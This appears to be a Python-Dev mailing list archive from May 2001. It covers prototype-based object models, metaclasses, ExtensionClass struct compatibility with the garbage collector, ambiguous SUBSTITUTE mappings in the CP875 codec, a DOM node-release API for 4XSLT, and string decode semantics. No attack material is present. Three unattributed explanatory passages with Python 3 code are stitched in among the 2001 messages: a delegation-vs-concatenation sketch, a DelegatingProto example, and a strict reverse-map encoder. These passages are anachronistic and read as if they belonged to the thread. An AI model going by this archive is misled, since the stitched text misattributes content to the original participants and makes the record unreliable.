"Birth sharing", copying, concatenation ] more like how I imagine C++ vtables are built -- the python equivalent would be like merging all of the class __dict__'s together with name-clash priority going to the nearest relative. ( "Life Sharing" vs. "Birth Sharing" -- is a change in the base class after object creation inherited by the object? ) I think most Multiple-Inheritance languages use delegation, but there's no reason it wouldn't work with extension. The diff is that in extension, everything has to get resolved at object creation. Extension could be made more flexible if on creation, you could not only add new methods, but rearrange and control the extension process ( sort of like "from xxx import yyy; from aaa import bbb" ). I would think one could use delegation by default, but provide an extension mechanism as an optimization, but I don't know if there's any system that does this. If it follows the paradigm, a prototype system doesn't have an 'isa' or '__class__' slot -- only a (linked) list of parent objects. But if you were simulating class orientation, one would add an 'isa' slot for the immediate prototype, and probably enforce some restrictions on the prototype objects that were playing the role of class objects. "If it follows the paradigm" -- as in OO in general, there are several flavors and implementations and some may be hybrid systems. Self is the language most widely known as a prototype based language: some others: NewtonScript (from Apple's late lamented Newton palmtop), Kevo (a Forth-based o-o language), Cardelli's Obliq (This didn't stick in my mind from when I read the papers back in the "safe python" development days, but it's listed in my book.) as well as XlispStat's object system. (which isn't listed in that book but there is an ObjectLisp -- I don't know if they were at all related. ) -- and Tim said JavaScript. The Amulet and Garnet GUI systems are prototype based -- Garnet written in Lisp and Amulet in C++.
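The "Life Sharing" vs. "Birth Sharing" question can be answered with a small experiment. A minimal sketch, assuming hypothetical helpers (`make_delegating`, `make_concatenated`, `resolved_slots`, `lookup`) that are not from any real system: a delegating object keeps a live parent link, while a concatenated object copies every slot visible at creation, with nearer definitions winning name clashes. A change to the "base class" afterwards is then visible only through delegation.

```python
from types import SimpleNamespace


def make_delegating(parent, **slots):
    """Delegation ("lifetime sharing"): keep a live link to the parent."""
    return SimpleNamespace(parent=parent, slots=dict(slots))


def resolved_slots(obj):
    """Every slot visible from obj, with nearer definitions overriding farther ones."""
    chain = []
    while obj is not None:
        chain.append(obj.slots)
        obj = obj.parent
    merged = {}
    for slots in reversed(chain):  # farthest ancestor first
        merged.update(slots)
    return merged


def make_concatenated(parent, **slots):
    """Extension ("birth sharing"): copy everything visible at creation time."""
    merged = resolved_slots(parent) if parent is not None else {}
    merged.update(slots)  # the new object's own slots win name clashes
    return SimpleNamespace(parent=None, slots=merged)


def lookup(obj, name):
    """Walk the parent links (a concatenated object has none to walk)."""
    while obj is not None:
        if name in obj.slots:
            return obj.slots[name]
        obj = obj.parent
    raise AttributeError(name)


base = make_delegating(None, greeting="hello")
live = make_delegating(base, name="live")
born = make_concatenated(base, name="born")

base.slots["greeting"] = "hi"  # change the "base class" after both objects exist
print(lookup(live, "greeting"), lookup(born, "greeting"))  # hi hello
```

The trade-off matches the description: the concatenated object resolves everything once, at creation, so its lookups never walk a chain, but it no longer sees later changes to its ancestors.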
For NewtonScript, Kevo, and maybe JavaScript, I suspect the simplicity of the system was a motivation. ("the book" I'm reading is "Prototype-Based Programming -- Concepts, Languages and Applications" ed. James Noble, Antero Taivalsaari, Ivan Moore, pub. Springer. A collection of papers, some of which are available on the Web -- I know the Self papers, one description of NewtonScript, and one or two articles on Kevo are online, as well as Cardelli's Obliq paper. ) -- "Steve" Majewski From martin at loewis.home.cs.tu-berlin.de Sat May 12 21:16:58 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 12 May 2001 21:16:58 +0200 Subject: [Python-Dev] GC and ExtensionClass Message-ID: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> > Has anyone investigated interactions between ExtensionClass objects > and GC? At some point, extension classes used a literal copy of PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so, and only had the spare fields that were expected then. Today, PyTypeObject has much more fields, so extension objects produce random errors (eg. with GC) when used in a modern interpreter (where the copy has not been synchronized). Whatever immediately follows the type object in memory may be interpreted as GC flag. Regards, Martin From guido at digicool.com Sat May 12 23:08:05 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 16:08:05 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Sat, 12 May 2001 21:16:58 +0200." <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> Message-ID: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> > At some point, extension classes used a literal copy of > PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so, > and only had the spare fields that were expected then. 
Today, > PyTypeObject has much more fields, so extension objects produce random > errors (eg. with GC) when used in a modern interpreter (where the copy > has not been synchronized). Whatever immediately follows the type > object in memory may be interpreted as GC flag. Not quite true. ExtensionClasses (at least recent versions that worked with 1.5.2) contain a copy of the type object up to and including the tp_flags field, and the 2.1 code is careful not to use any newer fields without first checking the corresponding flag bit. Now, if you are using the 1.4 version of ExtensionClasses you might not have the tp_flags field either (I don't know, I can't easily check) but the 1.5.2-compatible version of ExtensionClasses doesn't even require recompilation to work with Python 2.1. --Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Sat May 12 22:12:39 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 12 May 2001 22:12:39 +0200 Subject: [Python-Dev] Ill-defined encoding for CP875? Message-ID: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de> > But I don't know whether the ambiguity in cp875 is a bug or an > undocumented feature The official (as in "as official as it gets") mapping between CP 875 and Unicode is at http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT This is also the file which served as an input to generate cp875.py. Character 1A, which is the mapping result of these characters, is indeed known with the name "SUBSTITUTE", apparently following the definition in http://www.its.bldrdoc.gov/fs-1037/dir-035/_5170.htm # substitute character (SUB): A control character that is used in the # place of a character that is recognized to be invalid or in error or # that cannot be represented on a given device. That would suggest that these characters in EBCDIC 875 do not have equivalents in Unicode. 
However, http://www.kostis.net/charsets/ebc875.htm suggests that the characters in question (3F, DC, E1, EC, ED, FC, and FD) have no character meaning at all. It seems that IBM's ICU library also maps U+001A to character 3F, see http://oss.software.ibm.com/developerworks/opensource/cvs/icu/data/ibm-875_P100-2000.ucm?rev=1.1&content-type=text/x-cvsweb-markup It appears, from looking at http://www.natural-innovations.com/boo/asciiebcdic.html, that byte 3F *is* the substitution character in EBCDIC. So it is a bug in the CP875 codec to map Unicode SUBSTITUTE to an arbitrary EBCDIC character which is mapped to SUBSTITUTE; I think cp875 should be corrected to always map U+001A to 3F. That is not something the generator can currently do, though. So I think we can take one of two approaches:

1. admit that CP 875 is not round-trippable, and exclude it from the test (although when looking at the first 128 characters only, it is round-trippable).
2. remove the SUBSTITUTE mappings from CP875, acknowledging that apparently these characters have no meaning in that code page. Unfortunately, I could not find any official IBM documentation page that lists the characters supported in each of the EBCDIC code pages.

The second seems to be more correct to me, although it is a deviation from the Unicode consortium publications. Regards, Martin From guido at digicool.com Sat May 12 23:21:21 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 16:21:21 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Sat, 12 May 2001 11:07:06 -0400." References: Message-ID: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> > Also: There are two basic implementation models: > > Delegation [a.k.a. "Lifetime sharing", cloning] > sort of like python -- if you don't know how to handle it "ask" > a parent object.
( "ask" in quotes, because I've recently been > in a long argument about whether objective-C & smalltalk can > really be said to "send messages", or if it's "just" dynamic > lookup and function application! ) > > Extension [a.k.a. "Birth sharing", copying, concatenation ] > more like how I imagine C++ vtables are built -- the python > equivalent would be like merging all of the class __dict__'s > together with name-clash priority going to the nearest > relative. > > ( "Life Sharing" vs. "Birth Sharing" -- is a change in the > base class after object creation inherited by the object? ) Interesting. So is the rest of this thread, but since Python is not a prototype language and is unlikely to become one, I'd like to mention that Python 2.2 will likely allow you to choose either paradigm, on a per-class basis, using metaclasses. I'm finding metaclasses in Python useful for different things than they are in Smalltalk, and I expect that they will continue to play a less important role. But they are important because they control many "policy" aspects of Python classes/types: e.g. whether instances have a __dict__ or a specific set of slots (maybe even typed slots), whether changes can be made to a class after it's been created, the semantics of multiple inheritance, and so on. Right now, my metaclasses continue to be implemented in C, although I expect that eventually they will be subclassable in Python. Watch the descr-branch in the CVS tree. I hope I'll soon have some time to write a PEP, too. It's an interesting journey! The book I am reading about this: "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. http://cseng.awl.com/book/0,3828,0201433052,00.html --Guido van Rossum (home page: http://www.python.org/~guido/) From sdm7g at Virginia.EDU Sat May 12 22:53:26 2001 From: sdm7g at Virginia.EDU (Steven D.
Majewski) Date: Sat, 12 May 2001 16:53:26 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> Message-ID: On Sat, 12 May 2001, Guido van Rossum wrote: > Interesting. So is the rest of this thread, but since Python is not a > prototype language and is unlikely to become one, I'd like to mention > that Python 2.2 will likely allow you to choose either paradigm, on a > per-class basis, using metaclasses. As I said earlier: the only advantage would be if it could simplify things "under the hood" (compared to metaclasses) but could still provide the same Class semantics (with maybe a "proto" declaration sneaking its nose in under the tent.) But I have no immediate idea on how to do that, and it sounds like you're pretty far along into an implementation already. > I'm finding metaclasses in Python useful for different things than > they are in Smalltalk, and I expect that they will continue to play a > less important role. But they are important because they control many > "policy" aspects of Python classes/types: e.g. whether instances have > a __dict__ or a specific set of slots (maybe even typed slots), > whether changes can be made to a class after it's been created, the > semantics of multiple inheritance, and so on. I guess my practical question, which I meant to ask before I got myself sidetracked into preaching prototypes, is: How much of the existing plumbing (specifically the Don Beaudry hack) can I rely on in the future for the objective-C/python bridge? With BOOST and Zope's extension classes relying on it, can I assume that it's being extended rather than replaced? ( I guess I ought to take a look at the code! ) > It's an interesting journey! The book I am reading about this: > "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. > http://cseng.awl.com/book/0,3828,0201433052,00.html Thanks for the reference.
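The two prototype models contrasted earlier in this thread, delegation ("life sharing") and extension/concatenation ("birth sharing"), can be sketched in a few lines of Python 3. The class names `DelegatingProto` and `ConcatenatedProto` are hypothetical, and each object is just a dictionary of slots. The sketch only shows which model sees a change made to the parent after the child exists. It does not describe how Self, NewtonScript, Kevo, or Python metaclasses actually implement either model.

```python
class DelegatingProto:
    """Delegation ("life sharing"): missing slots are looked up in the parent at access time."""

    def __init__(self, parent=None, **slots):
        self.parent = parent
        self.slots = dict(slots)

    def lookup(self, name):
        obj = self
        while obj is not None:
            if name in obj.slots:
                return obj.slots[name]
            obj = obj.parent  # "ask" the parent
        raise AttributeError(name)


class ConcatenatedProto:
    """Concatenation ("birth sharing"): the parent's slots are copied when the child is created."""

    def __init__(self, parent=None, **slots):
        merged = dict(parent.slots) if parent is not None else {}
        merged.update(slots)  # on a name clash the nearest definition wins
        self.slots = merged

    def lookup(self, name):
        try:
            return self.slots[name]
        except KeyError:
            raise AttributeError(name) from None


base_d = DelegatingProto(greeting="hello")
child_d = DelegatingProto(base_d)
base_c = ConcatenatedProto(greeting="hello")
child_c = ConcatenatedProto(base_c)

# Change each parent after its child already exists.
base_d.slots["greeting"] = "bonjour"
base_c.slots["greeting"] = "bonjour"

print(child_d.lookup("greeting"))  # bonjour: the delegating child sees the change
print(child_c.lookup("greeting"))  # hello: the concatenated child kept its birth copy
```

In this sketch the trade-off is visible in `lookup`. Delegation pays for a parent-chain walk on every access but tracks later changes to the parent. Concatenation pays once, at creation, and afterwards is isolated from its parent.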
Talking about interesting journeys: Guido: did you ever imagine back at that first workshop at NIST that you and Python would be where you are today? -- Steve Majewski From gmcm at hypernet.com Sat May 12 23:09:41 2001 From: gmcm at hypernet.com (Gordon McMillan) Date: Sat, 12 May 2001 17:09:41 -0400 Subject: [Python-Dev] Type/class In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> References: Your message of "Sat, 12 May 2001 11:07:06 -0400." Message-ID: <3AFD6E55.1096.B4BFBD3F@localhost> [Guido] > It's an interesting journey! The book I am reading about this: > "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. > http://cseng.awl.com/book/0,3828,0201433052,00.html The two things that struck me most when I read that last year: - How eminently ill-suited C++ is for this stuff (the book develops a framework in C++) - a very convincing argument that if you derive C from A and B (whose metaclasses are not the same), the system must derive a metaclass for C, using MI from A and B's metaclasses. duct-tape-skull-cap-advised-ly y'rs - Gordon From tim.one at home.com Sat May 12 23:22:49 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 12 May 2001 17:22:49 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? In-Reply-To: <02e501c0dade$ab7f1080$e46940d5@hagrid> Message-ID: [/F] > reverse sorting makes sense to me. but the cp-files appear to be > machine generated, so patching that python file won't help. Agreed. > a truly future-proof solution would be to specify exactly how to > resolve every many-to-one mapping, for every font having that > problem. but sorting them is clearly better than relying on > implementation-dependent behaviour...
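One way to make the reverse map deterministic is sketched below in Python 3. It assumes that a codec module exposes a byte-to-code-point `decoding_map` dict like the generated cp*.py files, with None marking undefined bytes. The sketch walks the keys in sorted order, keeps the smallest byte for each code point, and records every collision so that a strict encoder can refuse the character instead of guessing. The helper names `invert_decoding_map` and `encode_strict` are hypothetical. The sample map is only an excerpt: the seven 0x1a entries quoted in this thread, plus NUL, which maps to itself.

```python
def invert_decoding_map(decoding_map):
    """Invert a byte -> code point map, resolving many-to-one entries deterministically.

    Returns (encoding_map, ambiguous). encoding_map keeps the smallest byte
    for each code point. ambiguous maps every shared code point to all of
    its candidate bytes, in ascending order.
    """
    encoding_map = {}
    ambiguous = {}
    for byte in sorted(decoding_map):
        code_point = decoding_map[byte]
        if code_point is None:  # undefined byte: nothing to invert
            continue
        if code_point in encoding_map:
            first = encoding_map[code_point]
            ambiguous.setdefault(code_point, [first]).append(byte)
        else:
            encoding_map[code_point] = byte
    return encoding_map, ambiguous


def encode_strict(text, encoding_map, ambiguous):
    """Encode text, refusing characters whose reverse mapping is ambiguous."""
    out = bytearray()
    for ch in text:
        code_point = ord(ch)
        if code_point in ambiguous:
            choices = ", ".join(hex(b) for b in ambiguous[code_point])
            raise ValueError("U+%04X could come from any of: %s" % (code_point, choices))
        out.append(encoding_map[code_point])  # KeyError if unmappable
    return bytes(out)


# Excerpt only: the 0x1a entries quoted in this thread, plus NUL -> NUL.
decoding_map = {0x00: 0x00, 0x3f: 0x1a, 0xdc: 0x1a, 0xe1: 0x1a,
                0xec: 0x1a, 0xed: 0x1a, 0xfc: 0x1a, 0xfd: 0x1a}
encoding_map, ambiguous = invert_decoding_map(decoding_map)
print(hex(encoding_map[0x1a]))  # 0x3f
print(encode_strict("\x00", encoding_map, ambiguous))  # b'\x00'
```

Keeping the smallest byte happens to send U+001A to 0x3f, which is the target Martin argues for in this thread. A strict encoder takes the other route and raises an error rather than silently choosing one of the seven candidates.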
The attached program suggests the problem is rare; of those encoding files that have a Python decoding_map dict, only these triggered a meaningful ambiguity complaint:

*** cp1006.py maps 0xfe8e back to 0xb1, 0xb2
*** cp875.py maps 0x1a back to 0x3f, 0xdc, 0xe1, 0xec, 0xed, 0xfc, 0xfd

Then since test_unicode only checks for roundtrip across range(0x80), cp875 is the only one that *can* fail (the ambiguities in cp1006 are for points > 0x7f, so aren't tested here). Hmm! Now I see that in a part of test_unicode that wasn't reached, cp875 and cp1006 are excluded, with this comment:

    ### These fail the round-trip:
    #'cp1006', 'cp875', 'iso8859_8',

So the practical hack for now is to exclude cp875 from the earlier range(128) roundtrip test too.
> (is Jython using exactly the same hashing and dictionary algorithms as > CPython? or does it work by accident also under Jython?) Sorry, no idea. Attempting to browse the Jython source on SourceForge caused this cute behavior:

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/jython/jython/Lib/

    Python Exception Occurred

    Traceback (innermost last):
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2286, in ?
        main()
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2253, in main
        view_directory(request)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 1043, in view_directory
        fileinfo, alltags = get_logs(full_name, rcs_files, view_tag)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 987, in get_logs
        raise 'error during rlog: '+hex(status)
    error during rlog: 0x100

let's-rewrite-it-in-php-ly y'rs - tim

ENCODING_DIR = "../Lib/encodings"

import os
import imp

def d(w):
    if type(w) is type(6):
        return hex(w)
    else:
        return repr(w)

encfiles = [name for name in os.listdir(ENCODING_DIR)
                 if name.endswith(".py") and name[0] != "_"]

for fname in encfiles:
    path = os.path.join(ENCODING_DIR, fname)
    f = open(path)
    module = imp.load_source(fname[:-3], path, f)
    f.close()
    decode = getattr(module, "decoding_map", None)
    if decode is None:
        print fname, "doesn't have decoding_map."
        continue
    vtok = {}
    for k, v in decode.items():
        if v in vtok:
            vtok[v].append(k)
        else:
            vtok[v] = [k]
    ambiguous = [(v, ks) for v, ks in vtok.items() if len(ks) > 1]
    if ambiguous:
        for v, ks in ambiguous:
            ks.sort()
            print "***", fname, "maps", d(v), "back to", \
                  ", ".join(map(d, ks))
    else:
        print fname, "is free of ambiguous reverse maps."

From tim.one at home.com Sat May 12 23:48:38 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 12 May 2001 17:48:38 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis, whose encyclopedic knowledge of encoding details still isn't enough to get a clear answer (it's like somebody asking me for a simple answer to a floating point question] > ... > So I think we can take one of two approaches: > > 1. admit that CP 875 is not round-trippable, and exclude it from the > test (although when looking at the first 128 characters only, it > is round-trippable). As I noted later, 875 is already excluded from the roundtrip test across range(128, 256). What it's failing is the roundtrip test across range(128): after unicode("?", "cp875") produces u'\x1a', the following .encode('cp875') has no way to know which range the original input came from. So it's not really round-trippable across range(128) either unless more info is given to .encode(). > 2. remove the SUBSTITUTE mappings from CP875, acknowledging that > apparently these characters have no meaning in that code page. > Unfortunately, I could not find any official IBM documentation > page that lists the characters supported in each of the EBCDIC > code pages. > > The second seems to be more correct to me, although it is a deviation > from the Unicode consortium publications.
Until you and MAL agree on the best thing to do (I have no opinion: my only exposure to Unicode in daily programming life remains the Python test suite), I'm going to opt for #1: as cp875.py stands today, it's simply a fact that it's not round-trippable across any range including 0x3f. From martin at loewis.home.cs.tu-berlin.de Sun May 13 00:32:10 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 00:32:10 +0200 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> (message from Guido van Rossum on Sat, 12 May 2001 16:08:05 -0500) References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> Message-ID: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> > Now, if you are using the 1.4 version of ExtensionClasses you might > not have the tp_flags field either (I don't know, I can't easily > check) but the 1.5.2-compatible version of ExtensionClasses doesn't > even require recompilation to work with Python 2.1. I'll attach a copy below of the struct as defined in pygtk-0.7.0-unstable-dont-use.tar.gz (0.6.6 does not use extension classes). As you can see, it does not provide tp_flags, but has a field of tp_xxx4 for it. That *should* work, except that it also has its 'methods' field where tp_traverse would go, and its class_flags field where tp_clear would go. Now, you write > ExtensionClasses (at least recent versions that worked with 1.5.2) > contain a copy of the type object up to and including the tp_flags > field, and the 2.1 code is careful not to use any newer fields > without first checking the corresponding flag bit. In this generality, it is apparently not true: Modules/gcmodule.c has, in delete_garbage,

    if ((clear = op->ob_type->tp_clear) != NULL) {
    ...
    traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
    (void) traverse(PyObject_FROM_GC(gc),
                    (visitproc)visit_decref,
                    NULL);

which does not check any flags. That still shouldn't cause any problems, since the Gtk objects should never end up in the GC lists - but maybe I'm missing something. Regards, Martin

typedef struct {
    PyObject_VAR_HEAD
    char *tp_name; /* For printing */
    int tp_basicsize, tp_itemsize; /* For allocation */

    /* Methods to implement standard operations */

    destructor tp_dealloc;
    printfunc tp_print;
    getattrfunc tp_getattr;
    setattrfunc tp_setattr;
    cmpfunc tp_compare;
    reprfunc tp_repr;

    /* Method suites for standard classes */

    PyNumberMethods *tp_as_number;
    PySequenceMethods *tp_as_sequence;
    PyMappingMethods *tp_as_mapping;

    /* More standard operations (at end for binary compatibility) */

    hashfunc tp_hash;
    ternaryfunc tp_call;
    reprfunc tp_str;
    getattrofunc tp_getattro;
    setattrofunc tp_setattro;

    /* Space for future expansion */
    long tp_xxx3;
    long tp_xxx4;

    char *tp_doc; /* Documentation string */

#ifdef COUNT_ALLOCS
    /* these must be last */
    int tp_alloc;
    int tp_free;
    int tp_maxalloc;
    struct _typeobject *tp_next;
#endif
    PyMethodChain methods;
    long class_flags;
    PyObject *class_dictionary;
    PyObject *bases;
    PyObject *reserved;
} PyExtensionClass;

From martin at loewis.home.cs.tu-berlin.de Sun May 13 14:08:02 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 14:08:02 +0200 Subject: [Python-Dev] ReleaseNode interface in 4XSLT Message-ID: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> Currently, 4XSLT has a dependency on the DOM implementation in terms of memory management (among other dependencies). I'd like to reduce this dependency, by providing a centralized function that knows how to release nodes.
In PyXML, I currently use

    # Define ReleaseNode in a DOM-independent way
    import xml.dom.ext
    import xml.dom.minidom

    def _releasenode(n):
        if isinstance(n, xml.dom.minidom.Node):
            n.unlink()
        else:
            xml.dom.ext.ReleaseNode(n)

    try:
        from Ft.Lib import pDomlette
        def ReleaseNode(n):
            if isinstance(n, pDomlette.Node):
                pDomlette.ReleaseNode(n)
            else:
                _releasenode(n)
        _XsltElementBase = pDomlette.Element
    except ImportError:
        ReleaseNode = _releasenode
        from minisupport import _XsltElementBase

This code knows how to release minidom, 4DOM, and pDomlette nodes, and supports installations without 4Suite (i.e. without pDomlette). I've put this into xslt/__init__.py, so that all callers of Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode. If desired, I could produce a patch against the public Ft CVS. As a slightly independent question, such a function also ought to support DOM implementations not known to it; I'm thinking in particular of the Zope DOMs. I'd like to hear proposals on how such an interface should work; I see three options:

a) it is an operation on the document node (or any node), as in minidom.
b) it is an operation on the DOM implementation (almost as in 4Suite; you'd need to navigate from the node to the implementation, then you'd need a well-known operation on the implementation)
c) the code assumes that no release activity is necessary for unknown DOMs, effectively believing in reference counting, garbage collection, acquisition, and other black art.

Any comments appreciated, in particular
1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
2. from authors of other DOMs on a general memory management API for Python DOM.

Regards, Martin From mwh at python.net Sun May 13 14:36:26 2001 From: mwh at python.net (Michael Hudson) Date: 13 May 2001 13:36:26 +0100 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: "M.-A.
Lemburg"'s message of "Fri, 11 May 2001 12:07:40 +0200" References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > Fredrik Lundh wrote: > > can you take that again? shouldn't michael's example be > > equivalent to: > > > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > > > if not, I'd argue that your "decode" design is broken, instead > > of just buggy... > > Well, it is sort of broken, I agree. The reason is that > PyString_Encode() and PyString_Decode() guarantee the returned > object to be a string object. To be able to reuse Unicode codecs > I added code which converts Unicode back to a string in case the > codec return an Unicode object (which the .decode() method does). > This is what's failing. It strikes me that if someone executes aString.decode("latin-1") they're going to expect a unicode string. AIUI, what's currently happening is that the string is converted from a latin-1 8-bit string to the 16-bit unicode string I expected and then there is an attempt to convert it back to an 8-bit string using the default encoding. So if I'd done a sys.setdefaultencoding("latin-1") in my sitecustomize.py, then aString.decode("latin-1") would just be aString again? This doesn't seem optimal. > Perhaps I should simply remove the restriction and have both APIs > return the codec's return object as-is ?! (I would be in favour of > this, but I'm not sure whether this is already in use by someone...) Are all the codecs distributed with Python 2.1 unicode-related? If that's the case, PyString_Decode isn't terribly useful, is it? It seems unlikely that it received much use. Could be wrong of course. OTOH, maybe I'm trying to wedge too much behaviour onto a particular operation.
Do we want open(file).read().decode("jpeg") -> some kind of PIL object to be possible? Cheers, M. -- GET *BONK* BACK *BONK* IN *BONK* THERE *BONK* -- Naich using the troll hammer in cam.misc From mal at lemburg.com Sun May 13 18:53:55 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 18:53:55 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> Message-ID: <3AFEBC22.1F0AF685@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > Fredrik Lundh wrote: > > > can you take that again? shouldn't michael's example be > > > equivalent to: > > > > > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > > > > > if not, I'd argue that your "decode" design is broken, instead > > > of just buggy... > > > > Well, it is sort of broken, I agree. The reason is that > > PyString_Encode() and PyString_Decode() guarantee the returned > > object to be a string object. To be able to reuse Unicode codecs > > I added code which converts Unicode back to a string in case the > > codec return an Unicode object (which the .decode() method does). > > This is what's failing. > > It strikes me that if someone executes > > aString.decode("latin-1") > > they're going to expect a unicode string. AIUI, what's currently > happening is that the string is converted from a latin-1 8-bit string > to the 16-bit unicode string I expected and then there is an attempt > to convert it back to an 8-bit string using the default encoding. So > if I'd done a > > sys.setdefaultencoding("latin-1") > > in my sitecustomize.py, then aString.decode("latin-1") would just be > aString again? This doesn't seem optimal. 
True and that's why I am proposing to loosen the restriction on having the two APIs return strings only. > > Perhaps I should simply remove the restriction and have both APIs > > return the codec's return object as-is ?! (I would be in favour of > > this, but I'm not sure whether this is already in use by someone...) > > Are all the codecs distributed with Python 2.1 unicode-related? If > that's the case, PyString_Decode isn't terribly useful, is it? It > seems unlikely that it received much use. Could be wrong of course. All standard codecs in 2.0 and 2.1 are Unicode-related. I am planning to write up a bunch of string-to-string codecs next week though which will then be the first non-Unicode-related codecs in 2.2. > OTOH, maybe I'm trying to wedge too much behaviour onto a particular > operation. Do we want > > open(file).read().decode("jpeg") -> some kind of PIL object > > to be possible? This would be possible indeed. Even though some may find this coding style obscure, I think this technique has the same usefulness as e.g. piping at OS level. I am thinking of these use cases:

    "???".decode("latin-1") -> Unicode (object construction)
    "...jpeg data...".decode("jpeg") -> JpegImage object (ditto)
    "???".decode("latin-1").encode("cp1521") -> string (recoding data)
    "...long data...".encode("gzip") -> string (transfer encoding)
    "...gzipped data...".decode("gzip") -> string (transfer decoding)

-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Sun May 13 19:20:01 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 19:20:01 +0200 Subject: [Python-Dev] Re: Ill-defined encoding for CP875?
References: Message-ID: <3AFEC241.62084286@lemburg.com> Tim Peters wrote: > > I have a way to make dict lookup a teensy bit cheaper(*) that significantly > reduces the number of collisions (which is much more valuable). > > This caused a number of std tests to fail, because they were implicitly > relying on the order in which a dict's entries are materialized via .keys() > or .items(). > > Most of these were easy enough to fix. The last failure remaining is > test_unicode, and I don't know how to fix it. It's dying here:
>
>     try:
>         verify(unicode(s,encoding).encode(encoding) == s)
>     except TestFailed:
>         print '*** codec "%s" failed round-trip' % encoding
>     except ValueError,why:
>         print '*** codec for "%s" failed: %s' % (encoding, why)
>
> when encoding == "cp875". There's a bogus problem you have to worm around > first: test_unicode neglected to import TestFailed, so it actually dies > with NameError while trying the "except TestFailed" clause after verify() > raises TestFailed. Once that's repaired, it's complaining about failing the > round-trip encoding. Ooops; this must have been caused by the assert statement removal in the test suite I hacked up some months ago. Funny that it never showed up... the code seems to be very robust ;-) > The original character in s it's griping about is "?" (0x3f). cp875.py has > this entry in its decoding_map dict:
>
>     0x003f: 0x001a, # SUBSTITUTE
>
> But 0x1a is not a *unique* value in this dict. There's also
>
>     0x00dc: 0x001a, # SUBSTITUTE
>     0x00e1: 0x001a, # SUBSTITUTE
>     0x00ec: 0x001a, # SUBSTITUTE
>     0x00ed: 0x001a, # SUBSTITUTE
>     0x00fc: 0x001a, # SUBSTITUTE
>     0x00fd: 0x001a, # SUBSTITUTE
>
> Therefore what appears associated with 0x1a in the derived encoding_map > dict:
>
>     encoding_map = {}
>     for k,v in decoding_map.items():
>         encoding_map[v] = k
>
> may end up being any of the 7 decoding_map keys that map to 0x1a. It just > so happened to map back to 0x3f before, but to 0xfd after the dict change, > so "?"
